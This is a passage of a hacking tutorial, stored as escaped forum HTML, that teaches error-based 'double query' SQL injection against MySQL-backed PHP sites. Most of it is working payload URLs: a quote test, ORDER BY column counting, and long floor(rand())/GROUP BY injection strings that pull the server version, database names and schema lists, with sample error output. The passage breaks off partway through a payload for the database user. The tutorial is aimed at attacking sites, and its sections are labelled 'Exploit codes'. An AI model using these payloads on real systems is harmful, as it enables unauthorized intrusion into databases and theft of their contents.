auto;"&gt;http://www.[site].com/page.php?id=1&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;http://www.[site].com/page.php?id=1'&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;If something like this pops up? Then it is vulnerable:&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''5''' at line 1&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="color: orange;"&gt;1. Checking column count.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;http://www.[site].com/page.php?id=1+order+by+1--+- [no error]&lt;br /&gt;http://www.[site].com/page.php?id=1+order+by+99--+- [!!error!!]&lt;br /&gt;http://www.[site].com/page.php?id=1+order+by+2--+- [no error]&lt;br /&gt;http://www.[site].com/page.php?id=1+order+by+3--+- [no error]&lt;br /&gt;http://www.[site].com/page.php?id=1+order+by+4--+- [error]&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;Why do i do order by 99?&lt;br /&gt;To check if we don't have to use a string injection.&lt;br /&gt;If you do not get an error when u use order+by+99--+-&lt;br /&gt;then you need string injection. (explained in basic tutorial.)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Now we had this part. Lets move on to the union statement.&lt;br /&gt;We know we have 3 columns now.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: orange;"&gt;1. Checking Union select statement.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;http://www.[site].com/page.php?id=1+union+select+1,2,3--+-&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;You do not get to see any content whit numbers.&lt;br /&gt;Instead you get this error!&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;"The used SELECT statements have a different number of columns"&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;We all know what that means.&lt;br /&gt;This is where double query jumps in!&lt;br /&gt;&lt;br /&gt;&lt;span style="color: green;"&gt;Part 2. extracting information double query!&lt;/span&gt;&lt;br /&gt;&lt;span style="color: orange;"&gt;2. Exploit codes. Version&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Finding the version:&lt;br /&gt;&lt;div class="codeblock phpcodeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;PHP Code:&lt;/div&gt;&lt;div class="body"&gt;&lt;div dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: #0000bb;"&gt;http&lt;/span&gt;&lt;span style="color: #007700;"&gt;:&lt;/span&gt;&lt;span style="color: #ff8000;"&gt;//www.[site].com/index.php?id=1&amp;nbsp;and(select&amp;nbsp;1&amp;nbsp;from(select&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;count&lt;/span&gt;&lt;span style="color: #007700;"&gt;(*),&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;concat&lt;/span&gt;&lt;span style="color: #007700;"&gt;((&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;select&amp;nbsp;&lt;/span&gt;&lt;span style="color: #007700;"&gt;(&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;select&amp;nbsp;concat&lt;/span&gt;&lt;span style="color: #007700;"&gt;(&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0x7e&lt;/span&gt;&lt;span style="color: #007700;"&gt;,&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0x27&lt;/span&gt;&lt;span style="color: #007700;"&gt;,&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;cast&lt;/span&gt;&lt;span style="color: #007700;"&gt;(&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;version&lt;/span&gt;&lt;span style="color: #007700;"&gt;()&amp;nbsp;as&amp;nbsp;&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;char&lt;/span&gt;&lt;span style="color: #007700;"&gt;),&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0x27&lt;/span&gt;&lt;span style="color: #007700;"&gt;,&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0x7e&lt;/span&gt;&lt;span style="color: #007700;"&gt;))&amp;nbsp;&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;from&amp;nbsp;information_schema&lt;/span&gt;&lt;span style="color: #007700;"&gt;.&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;tables&amp;nbsp;limit&lt;br /&gt;0&lt;/span&gt;&lt;span style="color: #007700;"&gt;,&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;1&lt;/span&gt;&lt;span style="color: #007700;"&gt;),&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;floor&lt;/span&gt;&lt;span style="color: #007700;"&gt;(&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;rand&lt;/span&gt;&lt;span style="color: #007700;"&gt;(&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0&lt;/span&gt;&lt;span style="color: #007700;"&gt;)*&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;2&lt;/span&gt;&lt;span style="color: #007700;"&gt;))&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;x&amp;nbsp;from&amp;nbsp;information_schema&lt;/span&gt;&lt;span style="color: #007700;"&gt;.&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;tables&amp;nbsp;group&amp;nbsp;by&amp;nbsp;x&lt;/span&gt;&lt;span style="color: #007700;"&gt;)&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;a&lt;/span&gt;&lt;span style="color: #007700;"&gt;)&amp;nbsp;and&amp;nbsp;&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;1&lt;/span&gt;&lt;span style="color: #007700;"&gt;=&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;1&amp;nbsp;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;Now this is a hell of a code!&lt;br /&gt;But it actually just says:&lt;br /&gt;We select the version as char frim the database tables whit a limit 0,1 to get the first.&lt;br /&gt;and we close whit and 1=1 which means true.&lt;br /&gt;&lt;br /&gt;Its hard for me to explain this full code.&lt;br /&gt;i tried as simple as possible.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: orange;"&gt;2. Exploit Output. Version&lt;/span&gt;&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;Duplicate entry '~'5.0.91'~1' for key 1&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;The lucky part about this methode is we get the answer in the error.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: orange;"&gt;2. Exploit codes. Database&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Finding the database:&lt;br /&gt;&lt;div class="codeblock phpcodeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;PHP Code:&lt;/div&gt;&lt;div class="body"&gt;&lt;div dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: #0000bb;"&gt;http&lt;/span&gt;&lt;span style="color: #007700;"&gt;:&lt;/span&gt;&lt;span style="color: #ff8000;"&gt;//www.[site].com/index.php?id=1&amp;nbsp;and(select&amp;nbsp;1&amp;nbsp;from(select&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;count&lt;/span&gt;&lt;span style="color: #007700;"&gt;(*),&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;concat&lt;/span&gt;&lt;span style="color: #007700;"&gt;((&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;select&amp;nbsp;&lt;/span&gt;&lt;span style="color: #007700;"&gt;(&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;select&amp;nbsp;concat&lt;/span&gt;&lt;span style="color: #007700;"&gt;(&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0x7e&lt;/span&gt;&lt;span style="color: #007700;"&gt;,&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0x27&lt;/span&gt;&lt;span style="color: #007700;"&gt;,&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;cast&lt;/span&gt;&lt;span style="color: #007700;"&gt;(&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;database&lt;/span&gt;&lt;span style="color: #007700;"&gt;()&amp;nbsp;as&amp;nbsp;&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;char&lt;/span&gt;&lt;span style="color: #007700;"&gt;),&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0x27&lt;/span&gt;&lt;span style="color: #007700;"&gt;,&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0x7e&lt;/span&gt;&lt;span style="color: #007700;"&gt;))&amp;nbsp;&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;from&amp;nbsp;information_schema&lt;/span&gt;&lt;span style="color: #007700;"&gt;.&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;tables&amp;nbsp;limit&lt;br /&gt;0&lt;/span&gt;&lt;span style="color: #007700;"&gt;,&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;1&lt;/span&gt;&lt;span style="color: #007700;"&gt;),&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;floor&lt;/span&gt;&lt;span style="color: #007700;"&gt;(&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;rand&lt;/span&gt;&lt;span style="color: #007700;"&gt;(&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0&lt;/span&gt;&lt;span style="color: #007700;"&gt;)*&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;2&lt;/span&gt;&lt;span style="color: #007700;"&gt;))&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;x&amp;nbsp;from&amp;nbsp;information_schema&lt;/span&gt;&lt;span style="color: #007700;"&gt;.&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;tables&amp;nbsp;group&amp;nbsp;by&amp;nbsp;x&lt;/span&gt;&lt;span style="color: #007700;"&gt;)&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;a&lt;/span&gt;&lt;span style="color: #007700;"&gt;)&amp;nbsp;and&amp;nbsp;&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;1&lt;/span&gt;&lt;span style="color: #007700;"&gt;=&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;1&amp;nbsp;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;Lets keep it easy.&lt;br /&gt;This code does exactly the same as the one for version.&lt;br /&gt;Only this one extracts database name.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: orange;"&gt;2. Exploit Output. Database&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;Duplicate entry '~'RealSteel_1' for key 1&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;The error says the database is RealSteel_1.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;This is relative to the database info:&lt;br /&gt;1. Count off databases.&lt;br /&gt;2. gather other database names.&lt;br /&gt;&lt;br /&gt;1:&lt;br /&gt;&lt;div class="codeblock phpcodeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;PHP Code:&lt;/div&gt;&lt;div class="body"&gt;&lt;div dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: #0000bb;"&gt;http&lt;/span&gt;&lt;span style="color: #007700;"&gt;:&lt;/span&gt;&lt;span style="color: #ff8000;"&gt;//www.[site].com/index.php?id=1&amp;nbsp;and(select&amp;nbsp;1&amp;nbsp;from(select&amp;nbsp;count(*),concat((select&amp;nbsp;(select&amp;nbsp;(SELECT&amp;nbsp;distinct&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;concat&lt;/span&gt;&lt;span style="color: #007700;"&gt;(&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0x7e&lt;/span&gt;&lt;span style="color: #007700;"&gt;,&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0x27&lt;/span&gt;&lt;span style="color: #007700;"&gt;,&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;count&lt;/span&gt;&lt;span style="color: #007700;"&gt;(&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;schema_name&lt;/span&gt;&lt;span style="color: #007700;"&gt;),&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0x27&lt;/span&gt;&lt;span style="color: #007700;"&gt;,&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0x7e&lt;/span&gt;&lt;span style="color: #007700;"&gt;)&amp;nbsp;&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;FROM&amp;nbsp;information_schema&lt;/span&gt;&lt;span style="color: #007700;"&gt;.&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;schemata&amp;nbsp;LIMIT&amp;nbsp;0&lt;/span&gt;&lt;span style="color: #007700;"&gt;,&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;1&lt;/span&gt;&lt;span style="color: #007700;"&gt;))&amp;nbsp;&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;from&amp;nbsp;information_schema&lt;/span&gt;&lt;span style="color: #007700;"&gt;.&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;tables&lt;br /&gt;limit&amp;nbsp;0&lt;/span&gt;&lt;span style="color: #007700;"&gt;,&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;1&lt;/span&gt;&lt;span style="color: #007700;"&gt;),&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;floor&lt;/span&gt;&lt;span style="color: #007700;"&gt;(&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;rand&lt;/span&gt;&lt;span style="color: #007700;"&gt;(&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0&lt;/span&gt;&lt;span style="color: #007700;"&gt;)*&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;2&lt;/span&gt;&lt;span style="color: #007700;"&gt;))&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;x&amp;nbsp;from&amp;nbsp;information_schema&lt;/span&gt;&lt;span style="color: #007700;"&gt;.&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;tables&amp;nbsp;group&amp;nbsp;by&amp;nbsp;x&lt;/span&gt;&lt;span style="color: #007700;"&gt;)&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;a&lt;/span&gt;&lt;span style="color: #007700;"&gt;)&amp;nbsp;and&amp;nbsp;&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;1&lt;/span&gt;&lt;span style="color: #007700;"&gt;=&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;1&amp;nbsp;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;If it sais you have more then one database.&lt;br /&gt;You can use this exploit to get the names 1 by 1.&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock phpcodeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;PHP Code:&lt;/div&gt;&lt;div class="body"&gt;&lt;div dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: #0000bb;"&gt;http&lt;/span&gt;&lt;span style="color: #007700;"&gt;:&lt;/span&gt;&lt;span style="color: #ff8000;"&gt;//www.[site].com/index.php?id=1&amp;nbsp;and(select&amp;nbsp;1&amp;nbsp;from(select&amp;nbsp;count(*),concat((select&amp;nbsp;(select&amp;nbsp;(SELECT&amp;nbsp;distinct&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;concat&lt;/span&gt;&lt;span style="color: #007700;"&gt;(&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0x7e&lt;/span&gt;&lt;span style="color: #007700;"&gt;,&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0x27&lt;/span&gt;&lt;span style="color: #007700;"&gt;,&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;cast&lt;/span&gt;&lt;span style="color: #007700;"&gt;(&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;schema_name&amp;nbsp;&lt;/span&gt;&lt;span style="color: #007700;"&gt;as&amp;nbsp;&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;char&lt;/span&gt;&lt;span style="color: #007700;"&gt;),&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0x27&lt;/span&gt;&lt;span style="color: #007700;"&gt;,&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0x7e&lt;/span&gt;&lt;span style="color: #007700;"&gt;)&amp;nbsp;&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;FROM&amp;nbsp;information_schema&lt;/span&gt;&lt;span style="color: #007700;"&gt;.&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;schemata&amp;nbsp;LIMIT&amp;nbsp;N&lt;/span&gt;&lt;span style="color: #007700;"&gt;,&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;1&lt;/span&gt;&lt;span style="color: #007700;"&gt;))&amp;nbsp;&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;from&lt;br /&gt;information_schema&lt;/span&gt;&lt;span style="color: #007700;"&gt;.&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;tables&amp;nbsp;limit&amp;nbsp;0&lt;/span&gt;&lt;span style="color: #007700;"&gt;,&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;1&lt;/span&gt;&lt;span style="color: #007700;"&gt;),&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;floor&lt;/span&gt;&lt;span style="color: #007700;"&gt;(&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;rand&lt;/span&gt;&lt;span style="color: #007700;"&gt;(&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0&lt;/span&gt;&lt;span style="color: #007700;"&gt;)*&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;2&lt;/span&gt;&lt;span style="color: #007700;"&gt;))&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;x&amp;nbsp;from&amp;nbsp;information_schema&lt;/span&gt;&lt;span style="color: #007700;"&gt;.&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;tables&amp;nbsp;group&amp;nbsp;by&amp;nbsp;x&lt;/span&gt;&lt;span style="color: #007700;"&gt;)&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;a&lt;/span&gt;&lt;span style="color: #007700;"&gt;)&amp;nbsp;and&amp;nbsp;&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;1&lt;/span&gt;&lt;span style="color: #007700;"&gt;=&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;1&amp;nbsp;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;Its not hard to get more then one.&lt;br /&gt;just keep increasing the limit 0,1.&lt;br /&gt;if you do 1,1 you get next database in line.&lt;br /&gt;if you do 2,1 you get second database in line.&lt;br /&gt;&lt;br /&gt;Not that hard at all.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: orange;"&gt;2. Exploit codes. Finding database user&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock phpcodeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;PHP Code:&lt;/div&gt;&lt;div class="body"&gt;&lt;div dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: #0000bb;"&gt;http&lt;/span&gt;&lt;span style="color: #007700;"&gt;:&lt;/span&gt;&lt;span style="color: #ff8000;"&gt;//www.[site].com/index.php?id=1&amp;nbsp;and(select&amp;nbsp;1&amp;nbsp;from(select&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;count&lt;/span&gt;&lt;span style="color: #007700;"&gt;(*),&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;concat&lt;/span&gt;&lt;span style="color: #007700;"&gt;((&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;select&amp;nbsp;&lt;/span&gt;&lt;span style="color: #007700;"&gt;(&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;select&amp;nbsp;concat&lt;/span&gt;&lt;span style="color: #007700;"&gt;(&lt;/span&gt;&lt;span style="color: 